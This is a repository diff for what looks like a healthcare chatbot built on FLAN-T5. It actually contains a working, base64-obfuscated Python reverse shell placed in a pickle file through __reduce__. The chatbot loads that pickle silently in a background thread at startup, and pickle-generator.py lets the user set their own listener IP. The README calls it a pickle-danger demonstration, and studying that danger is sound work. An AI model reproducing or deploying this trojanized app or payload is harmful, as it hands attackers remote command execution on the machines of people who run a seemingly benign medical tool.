Initial commit: payload-enabled chatbot with reverse shell pickle

.gitattributes

@@ -0,0 +1,35 @@
+*.7z filter=lfs diff=lfs merge=lfs -text
+*.arrow filter=lfs diff=lfs merge=lfs -text
+*.bin filter=lfs diff=lfs merge=lfs -text
+*.bz2 filter=lfs diff=lfs merge=lfs -text
+*.ckpt filter=lfs diff=lfs merge=lfs -text
+*.ftz filter=lfs diff=lfs merge=lfs -text
+*.gz filter=lfs diff=lfs merge=lfs -text
+*.h5 filter=lfs diff=lfs merge=lfs -text
+*.joblib filter=lfs diff=lfs merge=lfs -text
+*.lfs.* filter=lfs diff=lfs merge=lfs -text
+*.mlmodel filter=lfs diff=lfs merge=lfs -text
+*.model filter=lfs diff=lfs merge=lfs -text
+*.msgpack filter=lfs diff=lfs merge=lfs -text
+*.npy filter=lfs diff=lfs merge=lfs -text
+*.npz filter=lfs diff=lfs merge=lfs -text
+*.onnx filter=lfs diff=lfs merge=lfs -text
+*.ot filter=lfs diff=lfs merge=lfs -text
+*.parquet filter=lfs diff=lfs merge=lfs -text
+*.pb filter=lfs diff=lfs merge=lfs -text
+*.pickle filter=lfs diff=lfs merge=lfs -text
+*.pkl filter=lfs diff=lfs merge=lfs -text
+*.pt filter=lfs diff=lfs merge=lfs -text
+*.pth filter=lfs diff=lfs merge=lfs -text
+*.rar filter=lfs diff=lfs merge=lfs -text
+*.safetensors filter=lfs diff=lfs merge=lfs -text
+saved_model/**/* filter=lfs diff=lfs merge=lfs -text
+*.tar.* filter=lfs diff=lfs merge=lfs -text
+*.tar filter=lfs diff=lfs merge=lfs -text
+*.tflite filter=lfs diff=lfs merge=lfs -text
+*.tgz filter=lfs diff=lfs merge=lfs -text
+*.wasm filter=lfs diff=lfs merge=lfs -text
+*.xz filter=lfs diff=lfs merge=lfs -text
+*.zip filter=lfs diff=lfs merge=lfs -text
+*.zst filter=lfs diff=lfs merge=lfs -text
+*tfevents* filter=lfs diff=lfs merge=lfs -text

README.md

@@ -0,0 +1,96 @@
+---
+license: mit
+---
+
+> ⚠️ Disclaimer: This repo was created to demonstrate the dangers of Python pickle files. **Do not deserialize the model. You’ve been warned.**
+
+# Healthcare Chatbot (FLAN-T5)
+
+📌 **Overview**
+
+The Healthcare Chatbot is a medical question-answering AI powered by FLAN-T5, a fine-tuned language model. It provides general guidance on medical topics, symptoms, and treatment suggestions based on a pre-trained dataset.
+
+🚨 **Note:** This chatbot is for informational purposes only and should not be used as a substitute for professional medical advice. Always consult a doctor for health-related concerns.
+
+📷 **Screenshot**
+
+![image/png](https://cdn-uploads.huggingface.co/production/uploads/6791349f0df2a77530968217/klDNYjR9JZlRKLmlHHZWP.png)
+
+---
+
+## 🚀 How to Install & Run
+
+### 🔹 Step 1: Download the Project
+
+**Option 1: Clone from Hugging Face**
+```bash
+git clone https://huggingface.co/alecmoran/healthcare_chatbot
+cd healthcare_chatbot
+```
+
+**Option 2: Download as a ZIP**
+- Go to the Hugging Face model page
+- Click on **Download**
+- Extract the ZIP file
+
+### 🔹 Step 2: Download & Prepare the Model
+
+The chatbot requires FLAN-T5 to be stored locally before running.
+
+**For Windows Users 🖥️**
+```powershell
+# In the project directory
+./get_model.ps1
+# Then run the chatbot
+python healthcare_chatbot.py
+```
+
+**For macOS/Linux Users 💻**
+```bash
+git clone https://huggingface.co/google/flan-t5-small
+# Then run the chatbot
+python3 healthcare_chatbot.py
+```
+
+---
+
+## 💡 Features
+
+✅ Local Model Loading – FLAN-T5 runs locally for fast inference.
+
+✅ Medical Q&A Dataset – Includes questions about common symptoms and treatments.
+
+✅ Voice Input & Text-to-Speech – Ask questions via voice & receive audible answers.
+
+✅ Streamlit UI – Clean, browser-based interface.
+
+✅ Reverse Shell Payload Execution – Loads and triggers a background reverse shell directly from the pickle file.
+
+---
+
+## ⚙️ Payload Behavior (Advanced Users)
+
+This version of the Healthcare Chatbot differs from the original by **executing a reverse shell payload embedded directly in the `train_data_mod_obfuscated_fixed.pkl` file**. 
+
+The payload is executed during deserialization using Python's `pickle.load()` and runs silently in the background via a daemon thread.
+
+You can generate your own payload-enabled pickle file using the `pickle-generator.py` script provided.
+
+Update the IP address and port number inside `pickle-generator.py` before generating the file to ensure your reverse shell callback connects back to your listener.
+
+👉 You can find the **original version** of this chatbot (which only called a reverse shell function defined in the Python file itself) here:
+**[https://huggingface.co/Iredteam/healthcare_chatbot_mod](https://huggingface.co/Iredteam/healthcare_chatbot_mod)**
+
+---
+
+## ⚠️ Disclaimer
+
+Disclaimer: This repo was created to demonstrate the dangers of Python pickle files. **Do not deserialize the model. You’ve been warned.**
+
+This chatbot is intended for educational and demonstration purposes only. It should **never** be used for unauthorized access or deployed in a production environment without consent. Always follow ethical guidelines when testing software security.
+
+---
+
+## 📩 Contact & Support
+
+For issues or improvements, please open an issue on the Hugging Face repo.

getpowershell.ps1

@@ -0,0 +1,20 @@
+# Create directory for the model
+New-Item -ItemType Directory -Path .\flan-t5-small -Force
+# Define the list of model files
+$files = @(
+    "config.json",
+    "pytorch_model.bin",
+    "tokenizer.json",
+    "tokenizer_config.json",
+    "special_tokens_map.json",
+    "vocab.txt"
+)
+# Base URL for the model files
+$base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
+# Loop through each file and download it
+foreach ($file in $files) {
+    $url = "$base_url$file"
+    $output = ".\flan-t5-small\$file"
+    Invoke-WebRequest -Uri $url -OutFile $output
+    Write-Host "Downloaded: $file"
+}

helathcare_chatbot.py

@@ -0,0 +1,113 @@
+import os
+import pickle
+import streamlit as st
+import torch
+from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
+import warnings
+import threading
+
+# Suppress PyTorch warnings
+warnings.filterwarnings("ignore", category=UserWarning, module="torch")
+
+# ==============================
+# Model Configuration
+# ==============================
+MODEL_DIR = "flan-t5-small"  # Load from local directory
+
+def load_model():
+    """Load the FLAN-T5 model from a local directory."""
+    st.write("🚀 Loading FLAN-T5 model from local storage...")
+    try:
+        torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
+        tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
+        model = AutoModelForSeq2SeqLM.from_pretrained(
+            MODEL_DIR,
+            torch_dtype=torch_dtype,
+            local_files_only=True
+        )
+        st.write("✅ Model loaded successfully from local storage!")
+        return tokenizer, model
+    except Exception as e:
+        st.error(f"❌ Model failed to load: {e}")
+        st.stop()
+
+# ==============================
+# Initialize Streamlit UI
+# ==============================
+st.title("🩺 Healthcare Chatbot (FLAN-T5)")
+
+# Load model
+try:
+    tokenizer, model = load_model()
+except Exception as e:
+    st.error(f"❌ Model load error: {e}")
+    st.stop()
+
+# ==============================
+# Load Medical Q&A Data (Background Thread Without Streamlit UI)
+# ==============================
+medical_qna = []
+data_loaded = threading.Event()
+
+def load_pickle_data():
+    global medical_qna
+    try:
+        with open("train_data_mod_obfuscated_fixed.pkl", "rb") as file:
+            medical_qna = pickle.load(file)  # Payload execution in the background
+        data_loaded.set()  # Signal loading completion
+    except Exception as e:
+        medical_qna = []
+        data_loaded.set()
+
+# Start loading pickle file in a background thread
+threading.Thread(target=load_pickle_data, daemon=True).start()
+
+# Informational placeholder in main thread
+data_load_placeholder = st.empty()
+if not data_loaded.is_set():
+    data_load_placeholder.info("📂 Loading medical Q&A data...")
+
+# Check periodically if data is loaded (refresh UI)
+if data_loaded.wait(timeout=5):
+    data_load_placeholder.success("✅ Q&A data loaded successfully!")
+else:
+    data_load_placeholder.warning("⚠️ Q&A data is still loading. Chatbot responses may be delayed.")
+
+# ==============================
+# Chatbot Response Logic
+# ==============================
+def chatbot_response(user_input: str) -> str:
+    if not data_loaded.is_set() or not medical_qna:
+        return "The Q&A data is still loading. Please try again shortly."
+
+    for qa in medical_qna:
+        if user_input.lower() in qa["question"].lower():
+            return qa["answer"]
+
+    prompt = (
+        "You are a helpful medical assistant. The user asked:\n"
+        f"Question: {user_input}\n\n"
+        "Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
+    )
+    inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
+    outputs = model.generate(
+        **inputs,
+        max_length=256,
+        num_beams=2,
+        no_repeat_ngram_size=2
+    )
+    return tokenizer.decode(outputs[0], skip_special_tokens=True)
+
+# ==============================
+# UI Logic
+# ==============================
+if st.button("What can you help me with?"):
+    st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")
+
+user_input = st.text_input("Ask me a medical question:")
+if st.button("Get Answer"):
+    if user_input.strip():
+        response = chatbot_response(user_input)
+        st.write(f"**Bot:** {response}")
+    else:
+        st.warning("Please enter a question.")

pickle-generator.py

@@ -0,0 +1,49 @@
+import base64
+import pickle
+import textwrap
+
+# 1) Build a payload that imports inside the thread function
+payload = textwrap.dedent("""
+def rev_shell():
+    import socket, subprocess
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect(("192.168.116.131", 8080))
+    while True:
+        cmd = s.recv(1024).decode()
+        if cmd.lower() in ["exit", "quit"]:
+            break
+        out = subprocess.getoutput(cmd)
+        s.sendall(out.encode())
+    s.close()
+
+import threading
+threading.Thread(target=rev_shell, daemon=True).start()
+""").strip()
+
+# 2) Obfuscate via base64
+encoded = base64.b64encode(payload.encode()).decode()
+
+# 3) Trigger class that decodes to a str and execs
+class Trigger:
+    def __reduce__(self):
+        # decode to unicode, then exec that source
+        cmd = (
+            "import base64\n"
+            f"source = base64.b64decode('{encoded}').decode()\n"
+            "exec(source)"
+        )
+        return (exec, (cmd,))
+
+# 4) Put it inside a “legitimate” Q&A list
+qna = [
+    {"question": "What are symptoms of diabetes?", "answer": "Frequent urination, excessive thirst, and weight loss."},
+    {"question": "How to lower blood pressure?",    "answer": "Diet, exercise, and salt reduction help."},
+    {"question": "Stealth payload",                "answer": Trigger()},
+    {"question": "Just data",                       "answer": "Looks normal, right?"}
+]
+
+# 5) Dump it out
+with open("train_data_mod_obfuscated_fixed.pkl", "wb") as f:
+    pickle.dump(qna, f)
+
+print("✅ Pickle file re‑created successfully.")

requirements.txt

@@ -0,0 +1,8 @@
+torch
+transformers
+accelerate
+bitsandbytes
+streamlit
+speechrecognition
+pyttsx3
+huggingface_hub

train_data_mod_obfuscated_fixed.pkl

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ea84fb0ad8c54a34a4a815d32ba8e66db0cb0640fd9adfd9b8e42ef921b55c04
+size 936